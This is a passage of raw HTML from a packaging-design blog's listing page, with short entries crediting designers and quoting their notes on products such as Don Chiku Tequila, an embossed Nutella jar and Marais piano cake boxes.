style="padding-top:10px;margin-bottom:10px;font-size:10pt;font-family:arial;font-weight:bold;"></div><div style="clear:both"></div><a class=simplesocial onclick="return simplesocial(this,500,400)" title="Share on Facebook" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/facebook.png)" href="http://www.facebook.com/share.php?u=http%3A%2F%2Flovelypackage.com%2Fpepsi-prestige%2F&t=Pepsi+Prestige"></a><a class=simplesocial onclick="return simplesocial(this,812,420)" title="Share on Twitter" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/twitter.png)" href="http://twitter.com/home?status=http%3A%2F%2Flovelypackage.com%2Fpepsi-prestige%2F"></a><a class=simplesocial onclick="return simplesocial(this,435,500)" title="Email a Friend" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/email.png)" href="http://www.freetellafriend.com/tell/?heading=Share+This+Article&bg=1&option=email&url=http%3A%2F%2Flovelypackage.com%2Fpepsi-prestige%2F"></a><a class=simplesocial onclick="return simplesocial(this,750,500)" title="Share on StumbleUpon" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/stumbleupon.png)" href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Flovelypackage.com%2Fpepsi-prestige%2F&title=Pepsi+Prestige"></a></div><div style="clear:both;margin-bottom:20px"></div><div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Flovelypackage.com%2Fpepsi-prestige%2F&media=http%3A%2F%2Flovelypackage.com%2Fwp-content%2Fuploads%2F2018%2F02%2F54842-158879-pepsi-prestige-aluminum-bottle-image-1-e1518816730405.jpg&description=Pepsi%20Prestige" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div><div style="clear:both;"></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://lovelypackage.com/pepsi-prestige/" dc:identifier="http://lovelypackage.com/pepsi-prestige/" dc:title="Pepsi Prestige" trackback:ping="http://lovelypackage.com/pepsi-prestige/trackback/" /> </rdf:RDF> --> </div> <div class="entry-contnet"> <h2 class="entry-title"> <a class="entry-link" href="http://lovelypackage.com/don-chiku-tequila/" rel="bookmark">Don Chiku Tequila</a> </h2> <p class="date">March 12, 2018 | <a href="http://lovelypackage.com/don-chiku-tequila/#respond">0 Comments</a></p> <p><img class="alignnone size-full wp-image-38934" src="http://lovelypackage.com/wp-content/uploads/2018/02/53253-122587-don-chiku-tequila-packaging-design-image-5-e1518816323428.jpg" alt="53253-122587-don-chiku-tequila-packaging-design-image-5" width="538" height="538" /></p> <p>Designed by <a href="http://shumilovedesign.eu/" target="_blank">ShumiLoveDesign</a> | Country: Moldova</p> <p><em>&#8220;The primary source of inspiration was the distinct Mexican graphic style associated with the Dias de los Muertos. The design also features additional elements that provide a distinct link to Mexico.&#8221;</em></p> <p> <a href="http://lovelypackage.com/don-chiku-tequila/#more-38929" class="more-link">Continue…</a></p> <div><div style="padding-top:10px;margin-bottom:10px;font-size:10pt;font-family:arial;font-weight:bold;"></div><div style="clear:both"></div><a class=simplesocial onclick="return simplesocial(this,500,400)" title="Share on Facebook" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/facebook.png)" href="http://www.facebook.com/share.php?u=http%3A%2F%2Flovelypackage.com%2Fdon-chiku-tequila%2F&t=Don+Chiku+Tequila"></a><a class=simplesocial onclick="return simplesocial(this,812,420)" title="Share on Twitter" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/twitter.png)" href="http://twitter.com/home?status=http%3A%2F%2Flovelypackage.com%2Fdon-chiku-tequila%2F"></a><a class=simplesocial onclick="return simplesocial(this,435,500)" title="Email a Friend" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/email.png)" href="http://www.freetellafriend.com/tell/?heading=Share+This+Article&bg=1&option=email&url=http%3A%2F%2Flovelypackage.com%2Fdon-chiku-tequila%2F"></a><a class=simplesocial onclick="return simplesocial(this,750,500)" title="Share on StumbleUpon" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/stumbleupon.png)" href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Flovelypackage.com%2Fdon-chiku-tequila%2F&title=Don+Chiku+Tequila"></a></div><div style="clear:both;margin-bottom:20px"></div><div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Flovelypackage.com%2Fdon-chiku-tequila%2F&media=http%3A%2F%2Flovelypackage.com%2Fwp-content%2Fuploads%2F2018%2F02%2F53253-122587-don-chiku-tequila-packaging-design-image-5-e1518816323428.jpg&description=Don%20Chiku%20Tequila" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div><div style="clear:both;"></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://lovelypackage.com/don-chiku-tequila/" dc:identifier="http://lovelypackage.com/don-chiku-tequila/" dc:title="Don Chiku Tequila" trackback:ping="http://lovelypackage.com/don-chiku-tequila/trackback/" /> </rdf:RDF> --> </div> <div class="entry-contnet"> <h2 class="entry-title"> <a class="entry-link" href="http://lovelypackage.com/guilis/" rel="bookmark">Guilis</a> </h2> <p class="date">March 5, 2018 | <a href="http://lovelypackage.com/guilis/#respond">0 Comments</a></p> <p><img class="alignnone size-full wp-image-38927" src="http://lovelypackage.com/wp-content/uploads/2018/02/52666-175823-guilis-package-identity-image-5-e1518812764266.jpg" alt="52666-175823-guilis-package-identity-image-5" width="538" height="538" /></p> <p>Designed by <a href="http://pktwidz.pl/" target="_blank">Michal Sicinski</a> | Country: Poland</p> <p><em>&#8220;In designing process we assumed basic laws of good design: utility, economy and idea.</em><br /> <em>The idea proved to be the key and was very simple. We decided to use the international designation of countries, which the coffee comes from, and use them as a leitmotif of packaging series.&#8221;</em></p> <p> <a href="http://lovelypackage.com/guilis/#more-38922" class="more-link">Continue…</a></p> <div><div style="padding-top:10px;margin-bottom:10px;font-size:10pt;font-family:arial;font-weight:bold;"></div><div style="clear:both"></div><a class=simplesocial onclick="return simplesocial(this,500,400)" title="Share on Facebook" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/facebook.png)" href="http://www.facebook.com/share.php?u=http%3A%2F%2Flovelypackage.com%2Fguilis%2F&t=Guilis"></a><a class=simplesocial onclick="return simplesocial(this,812,420)" title="Share on Twitter" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/twitter.png)" href="http://twitter.com/home?status=http%3A%2F%2Flovelypackage.com%2Fguilis%2F"></a><a class=simplesocial onclick="return simplesocial(this,435,500)" title="Email a Friend" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/email.png)" href="http://www.freetellafriend.com/tell/?heading=Share+This+Article&bg=1&option=email&url=http%3A%2F%2Flovelypackage.com%2Fguilis%2F"></a><a class=simplesocial onclick="return simplesocial(this,750,500)" title="Share on StumbleUpon" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/stumbleupon.png)" href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Flovelypackage.com%2Fguilis%2F&title=Guilis"></a></div><div style="clear:both;margin-bottom:20px"></div><div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Flovelypackage.com%2Fguilis%2F&media=http%3A%2F%2Flovelypackage.com%2Fwp-content%2Fuploads%2F2018%2F02%2F52666-175823-guilis-package-identity-image-5-e1518812764266.jpg&description=Guilis" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div><div style="clear:both;"></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://lovelypackage.com/guilis/" dc:identifier="http://lovelypackage.com/guilis/" dc:title="Guilis" trackback:ping="http://lovelypackage.com/guilis/trackback/" /> </rdf:RDF> --> </div> <div class="entry-contnet"> <h2 class="entry-title"> <a class="entry-link" href="http://lovelypackage.com/embossed-nutella/" rel="bookmark">Embossed Nutella</a> </h2> <p class="date">February 26, 2018 | <a href="http://lovelypackage.com/embossed-nutella/#respond">0 Comments</a></p> <p><img class="alignnone size-full wp-image-38916" src="http://lovelypackage.com/wp-content/uploads/2018/02/52571-175607-embossed-nutella-jar-for-spreadable-cream-image-1-e1518812334152.jpg" alt="52571-175607-embossed-nutella-jar-for-spreadable-cream-image-1" width="538" height="538" /></p> <p>Designed by <a href="http://www.mrsmith.it/" target="_blank">MrSmith</a> | Country: Italy</p> <p><em>&#8220;The embossed Nutella jar has been designed to allow it to be reused for food preservation once the cream has been finished. We&#8217;ve designed a new format without losing the iconic shape of the Nutella jar and making it suitable for food preservation, with significant benefits in terms of ecological sustainability. On the front, a raised glass imprint shows the logo with the company’s traditional image.&#8221;</em></p> <p> <a href="http://lovelypackage.com/embossed-nutella/#more-38915" class="more-link">Continue…</a></p> <div><div style="padding-top:10px;margin-bottom:10px;font-size:10pt;font-family:arial;font-weight:bold;"></div><div style="clear:both"></div><a class=simplesocial onclick="return simplesocial(this,500,400)" title="Share on Facebook" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/facebook.png)" href="http://www.facebook.com/share.php?u=http%3A%2F%2Flovelypackage.com%2Fembossed-nutella%2F&t=Embossed+Nutella"></a><a class=simplesocial onclick="return simplesocial(this,812,420)" title="Share on Twitter" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/twitter.png)" href="http://twitter.com/home?status=http%3A%2F%2Flovelypackage.com%2Fembossed-nutella%2F"></a><a class=simplesocial onclick="return simplesocial(this,435,500)" title="Email a Friend" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/email.png)" href="http://www.freetellafriend.com/tell/?heading=Share+This+Article&bg=1&option=email&url=http%3A%2F%2Flovelypackage.com%2Fembossed-nutella%2F"></a><a class=simplesocial onclick="return simplesocial(this,750,500)" title="Share on StumbleUpon" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/stumbleupon.png)" href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Flovelypackage.com%2Fembossed-nutella%2F&title=Embossed+Nutella"></a></div><div style="clear:both;margin-bottom:20px"></div><div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Flovelypackage.com%2Fembossed-nutella%2F&media=http%3A%2F%2Flovelypackage.com%2Fwp-content%2Fuploads%2F2018%2F02%2F52571-175607-embossed-nutella-jar-for-spreadable-cream-image-1-e1518812334152.jpg&description=Embossed%20Nutella" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div><div style="clear:both;"></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://lovelypackage.com/embossed-nutella/" dc:identifier="http://lovelypackage.com/embossed-nutella/" dc:title="Embossed Nutella" trackback:ping="http://lovelypackage.com/embossed-nutella/trackback/" /> </rdf:RDF> --> </div> <div class="entry-contnet"> <h2 class="entry-title"> <a class="entry-link" href="http://lovelypackage.com/lays-year-of-the-monkey/" rel="bookmark">Lay’s Year of the Monkey</a> </h2> <p class="date">February 19, 2018 | <a href="http://lovelypackage.com/lays-year-of-the-monkey/#respond">0 Comments</a></p> <p><img class="alignnone size-full wp-image-38908" src="http://lovelypackage.com/wp-content/uploads/2018/02/52477-158879-lay’s-year-of-the-monkey-ltd-collection-snack-bag-image-1-e1518811730320.jpg" alt="52477-158879-lay’s-year-of-the-monkey-ltd-collection-snack-bag-image-1" width="538" height="538" /></p> <p>Designed by PepsiCo Design &amp; Innovation | Country: United States</p> <p><em>&#8220;In the Year of the Monkey, most brands in China celebrate the upcoming zodiac sign with a tailor-made monkey execution. This limited edition Lay’s packaging celebrates the Chinese New Year by featuring iconic monkey-faces that reinterpret the legendary zodiac sign in a relevant and youthful way.&#8221;</em></p> <p> <a href="http://lovelypackage.com/lays-year-of-the-monkey/#more-38907" class="more-link">Continue…</a></p> <div><div style="padding-top:10px;margin-bottom:10px;font-size:10pt;font-family:arial;font-weight:bold;"></div><div style="clear:both"></div><a class=simplesocial onclick="return simplesocial(this,500,400)" title="Share on Facebook" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/facebook.png)" href="http://www.facebook.com/share.php?u=http%3A%2F%2Flovelypackage.com%2Flays-year-of-the-monkey%2F&t=Lay%E2%80%99s+Year+of+the+Monkey"></a><a class=simplesocial onclick="return simplesocial(this,812,420)" title="Share on Twitter" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/twitter.png)" href="http://twitter.com/home?status=http%3A%2F%2Flovelypackage.com%2Flays-year-of-the-monkey%2F"></a><a class=simplesocial onclick="return simplesocial(this,435,500)" title="Email a Friend" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/email.png)" href="http://www.freetellafriend.com/tell/?heading=Share+This+Article&bg=1&option=email&url=http%3A%2F%2Flovelypackage.com%2Flays-year-of-the-monkey%2F"></a><a class=simplesocial onclick="return simplesocial(this,750,500)" title="Share on StumbleUpon" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/stumbleupon.png)" href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Flovelypackage.com%2Flays-year-of-the-monkey%2F&title=Lay%E2%80%99s+Year+of+the+Monkey"></a></div><div style="clear:both;margin-bottom:20px"></div><div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Flovelypackage.com%2Flays-year-of-the-monkey%2F&media=http%3A%2F%2Flovelypackage.com%2Fwp-content%2Fuploads%2F2018%2F02%2F52477-158879-lay%E2%80%99s-year-of-the-monkey-ltd-collection-snack-bag-image-1-e1518811730320.jpg&description=Lay%E2%80%99s%20Year%20of%20the%20Monkey" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div><div style="clear:both;"></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://lovelypackage.com/lays-year-of-the-monkey/" dc:identifier="http://lovelypackage.com/lays-year-of-the-monkey/" dc:title="Lay’s Year of the Monkey" trackback:ping="http://lovelypackage.com/lays-year-of-the-monkey/trackback/" /> </rdf:RDF> --> </div> <div class="entry-contnet"> <h2 class="entry-title"> <a class="entry-link" href="http://lovelypackage.com/good-hair-day-pasta/" rel="bookmark">Good Hair Day Pasta</a> </h2> <p class="date">February 12, 2018 | <a href="http://lovelypackage.com/good-hair-day-pasta/#respond">0 Comments</a></p> <p><img class="alignnone size-full wp-image-38901" src="http://lovelypackage.com/wp-content/uploads/2018/02/52197-174258-pasta-nikita-packaging-image-1-e1518451519531.jpg" alt="52197-174258-pasta-nikita-packaging-image-1" width="538" height="538" /></p> <p>Designed by <a href="http://nikitakonkin.com/" target="_blank">Nikita Konkin</a> | Country: Italy</p> <p><em>&#8220;When I was making this packaging I was in love and perhaps this influenced me, though it could be just a coincidence.</em></p> <p><em>I use the strands and shapes of pasta to create an interesting series of packaging that capture attention on the shelves. It emphasizes the high-quality &amp;amp; naturalness of pasta. </em><br /> <em>An of course It should bring good mood for people with good taste.&#8221;</em></p> <p> <a href="http://lovelypackage.com/good-hair-day-pasta/#more-38900" class="more-link">Continue…</a></p> <div><div style="padding-top:10px;margin-bottom:10px;font-size:10pt;font-family:arial;font-weight:bold;"></div><div style="clear:both"></div><a class=simplesocial onclick="return simplesocial(this,500,400)" title="Share on Facebook" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/facebook.png)" href="http://www.facebook.com/share.php?u=http%3A%2F%2Flovelypackage.com%2Fgood-hair-day-pasta%2F&t=Good+Hair+Day+Pasta"></a><a class=simplesocial onclick="return simplesocial(this,812,420)" title="Share on Twitter" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/twitter.png)" href="http://twitter.com/home?status=http%3A%2F%2Flovelypackage.com%2Fgood-hair-day-pasta%2F"></a><a class=simplesocial onclick="return simplesocial(this,435,500)" title="Email a Friend" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/email.png)" href="http://www.freetellafriend.com/tell/?heading=Share+This+Article&bg=1&option=email&url=http%3A%2F%2Flovelypackage.com%2Fgood-hair-day-pasta%2F"></a><a class=simplesocial onclick="return simplesocial(this,750,500)" title="Share on StumbleUpon" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/stumbleupon.png)" href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Flovelypackage.com%2Fgood-hair-day-pasta%2F&title=Good+Hair+Day+Pasta"></a></div><div style="clear:both;margin-bottom:20px"></div><div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Flovelypackage.com%2Fgood-hair-day-pasta%2F&media=http%3A%2F%2Flovelypackage.com%2Fwp-content%2Fuploads%2F2018%2F02%2F52197-174258-pasta-nikita-packaging-image-1-e1518451519531.jpg&description=Good%20Hair%20Day%20Pasta" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div><div style="clear:both;"></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://lovelypackage.com/good-hair-day-pasta/" dc:identifier="http://lovelypackage.com/good-hair-day-pasta/" dc:title="Good Hair Day Pasta" trackback:ping="http://lovelypackage.com/good-hair-day-pasta/trackback/" /> </rdf:RDF> --> </div> <div class="entry-contnet"> <h2 class="entry-title"> <a class="entry-link" href="http://lovelypackage.com/marais/" rel="bookmark">Marais</a> </h2> <p class="date">February 5, 2018 | <a href="http://lovelypackage.com/marais/#respond">0 Comments</a></p> <p><img class="alignnone size-full wp-image-38894" src="http://lovelypackage.com/wp-content/uploads/2018/01/51231-159493-marais-piano-cake-packaging-image-1-e1516237328330.jpg" alt="51231-159493-marais-piano-cake-packaging-image-1" width="538" height="538" /></p> <p>Designed by <a href="http://www.latona-m.com/" target="_blank">Latona</a> | Country: Japan</p> <p><em>&#8220;The inspiration for this design, the piano, is an instrument that creates beautiful harmonies from the combination of each individual key&#8217;s sound. You could say that society is a lot like this as well. We know that you will be giving this gift to someone important to you, and you want to give them something that was made with care. We&#8217;ve made each and every one of our gift boxes with our customers needs in mind. With each key of this gift box, your feelings are sure to be heard. </em><em>All Japanese pianos are made here in Shizuoka Prefecture. In Japan, as well, the piano is considered to be a special symbol of elegance and splendour.&#8221;</em></p> <p> <a href="http://lovelypackage.com/marais/#more-38893" class="more-link">Continue…</a></p> <div><div style="padding-top:10px;margin-bottom:10px;font-size:10pt;font-family:arial;font-weight:bold;"></div><div style="clear:both"></div><a class=simplesocial onclick="return simplesocial(this,500,400)" title="Share on Facebook" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/facebook.png)" href="http://www.facebook.com/share.php?u=http%3A%2F%2Flovelypackage.com%2Fmarais%2F&t=Marais"></a><a class=simplesocial onclick="return simplesocial(this,812,420)" title="Share on Twitter" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/twitter.png)" href="http://twitter.com/home?status=http%3A%2F%2Flovelypackage.com%2Fmarais%2F"></a><a class=simplesocial onclick="return simplesocial(this,435,500)" title="Email a Friend" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/email.png)" href="http://www.freetellafriend.com/tell/?heading=Share+This+Article&bg=1&option=email&url=http%3A%2F%2Flovelypackage.com%2Fmarais%2F"></a><a class=simplesocial onclick="return simplesocial(this,750,500)" title="Share on StumbleUpon" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/stumbleupon.png)" href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Flovelypackage.com%2Fmarais%2F&title=Marais"></a></div><div style="clear:both;margin-bottom:20px"></div><div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Flovelypackage.com%2Fmarais%2F&media=http%3A%2F%2Flovelypackage.com%2Fwp-content%2Fuploads%2F2018%2F01%2F51231-159493-marais-piano-cake-packaging-image-1-e1516237328330.jpg&description=Marais" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div><div style="clear:both;"></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://lovelypackage.com/marais/" dc:identifier="http://lovelypackage.com/marais/" dc:title="Marais" trackback:ping="http://lovelypackage.com/marais/trackback/" /> </rdf:RDF> --> </div> <div class="entry-contnet"> <h2 class="entry-title"> <a class="entry-link" href="http://lovelypackage.com/porto-ferreira/" rel="bookmark">Porto Ferreira</a> </h2> <p class="date">January 29, 2018 | <a href="http://lovelypackage.com/porto-ferreira/#respond">0 Comments</a></p> <p><img class="alignnone size-full wp-image-38887" src="http://lovelypackage.com/wp-content/uploads/2018/01/49471-155388-porto-ferreira-gift-pack-image-1-e1516236847240.jpg" alt="49471-155388-porto-ferreira-gift-pack-image-1" width="538" height="538" /></p> <p>Designed by <a href="http://www.omdesign.pt/" target="_blank">Omdesign</a> | Country: Portugal</p> <p><em>&#8220;The Portuguese advertising agency Omdesign was entirely responsible for the creativity and production of the unique and exclusive edition of the gift pack Porto Ferreira &#8211; Waterloo Vintage 1815.&#8221;</em></p> <p> <a href="http://lovelypackage.com/porto-ferreira/#more-38886" class="more-link">Continue…</a></p> <div><div style="padding-top:10px;margin-bottom:10px;font-size:10pt;font-family:arial;font-weight:bold;"></div><div style="clear:both"></div><a class=simplesocial onclick="return simplesocial(this,500,400)" title="Share on Facebook" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/facebook.png)" href="http://www.facebook.com/share.php?u=http%3A%2F%2Flovelypackage.com%2Fporto-ferreira%2F&t=Porto+Ferreira"></a><a class=simplesocial onclick="return simplesocial(this,812,420)" title="Share on Twitter" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/twitter.png)" href="http://twitter.com/home?status=http%3A%2F%2Flovelypackage.com%2Fporto-ferreira%2F"></a><a class=simplesocial onclick="return simplesocial(this,435,500)" title="Email a Friend" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/email.png)" href="http://www.freetellafriend.com/tell/?heading=Share+This+Article&bg=1&option=email&url=http%3A%2F%2Flovelypackage.com%2Fporto-ferreira%2F"></a><a class=simplesocial onclick="return simplesocial(this,750,500)" title="Share on StumbleUpon" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/stumbleupon.png)" href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Flovelypackage.com%2Fporto-ferreira%2F&title=Porto+Ferreira"></a></div><div style="clear:both;margin-bottom:20px"></div><div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Flovelypackage.com%2Fporto-ferreira%2F&media=http%3A%2F%2Flovelypackage.com%2Fwp-content%2Fuploads%2F2018%2F01%2F49471-155388-porto-ferreira-gift-pack-image-1-e1516236847240.jpg&description=Porto%20Ferreira" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div><div style="clear:both;"></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://lovelypackage.com/porto-ferreira/" dc:identifier="http://lovelypackage.com/porto-ferreira/" dc:title="Porto Ferreira" trackback:ping="http://lovelypackage.com/porto-ferreira/trackback/" /> </rdf:RDF> --> </div> <div class="entry-contnet"> <h2 class="entry-title"> <a class="entry-link" href="http://lovelypackage.com/diamond-cream-2/" rel="bookmark">Diamond Cream</a> </h2> <p class="date">January 22, 2018 | <a href="http://lovelypackage.com/diamond-cream-2/#respond">0 Comments</a></p> <p><img class="alignnone size-full wp-image-38881" src="http://lovelypackage.com/wp-content/uploads/2018/01/49372-165162-haertling-cosmetics-diamond-cream-high-fashion-and-luxury-packaging-image-3-e1516236064919.jpg" alt="49372-165162-haertling-cosmetics---diamond-cream-high-fashion-and-luxury-packaging-image-3" width="538" height="538" /></p> <p>Designed by <a href="http://www.lambrechtdesign.de/" target="_blank">Lambrecht</a> | Country: Germany</p> <p><em>&#8220;Our agency did a lot of cosmetic packaging design in the past. Also in the luxury brand packaging field. In the case of the HAERTLING DIAMOND CREAM the inspiration process was not that heavy. We have a luxury cosmetic series, based on diamond dust as one of the main ingredients. Obviously that we use the diamond as main visual element. What we did to give the whole packaging range a dignified appearance, was to create a unique diamond pattern. This pattern is adapted to every single product from the range.&#8221;</em></p> <p> <a href="http://lovelypackage.com/diamond-cream-2/#more-38878" class="more-link">Continue…</a></p> <div><div style="padding-top:10px;margin-bottom:10px;font-size:10pt;font-family:arial;font-weight:bold;"></div><div style="clear:both"></div><a class=simplesocial onclick="return simplesocial(this,500,400)" title="Share on Facebook" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/facebook.png)" href="http://www.facebook.com/share.php?u=http%3A%2F%2Flovelypackage.com%2Fdiamond-cream-2%2F&t=Diamond+Cream"></a><a class=simplesocial onclick="return simplesocial(this,812,420)" title="Share on Twitter" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/twitter.png)" href="http://twitter.com/home?status=http%3A%2F%2Flovelypackage.com%2Fdiamond-cream-2%2F"></a><a class=simplesocial onclick="return simplesocial(this,435,500)" title="Email a Friend" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/email.png)" href="http://www.freetellafriend.com/tell/?heading=Share+This+Article&bg=1&option=email&url=http%3A%2F%2Flovelypackage.com%2Fdiamond-cream-2%2F"></a><a class=simplesocial onclick="return simplesocial(this,750,500)" title="Share on StumbleUpon" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/stumbleupon.png)" href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Flovelypackage.com%2Fdiamond-cream-2%2F&title=Diamond+Cream"></a></div><div style="clear:both;margin-bottom:20px"></div><div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Flovelypackage.com%2Fdiamond-cream-2%2F&media=http%3A%2F%2Flovelypackage.com%2Fwp-content%2Fuploads%2F2018%2F01%2F49372-165162-haertling-cosmetics-diamond-cream-high-fashion-and-luxury-packaging-image-3-e1516236064919.jpg&description=Diamond%20Cream" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div><div style="clear:both;"></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://lovelypackage.com/diamond-cream-2/" dc:identifier="http://lovelypackage.com/diamond-cream-2/" dc:title="Diamond Cream" trackback:ping="http://lovelypackage.com/diamond-cream-2/trackback/" /> </rdf:RDF> --> </div> <div class='wp-pagenavi'> <span class='pages'>Page 1 of 370</span><span class='current'>1</span><a class="page larger" href="http://lovelypackage.com/page/2/">2</a><a class="page larger" href="http://lovelypackage.com/page/3/">3</a><a class="page 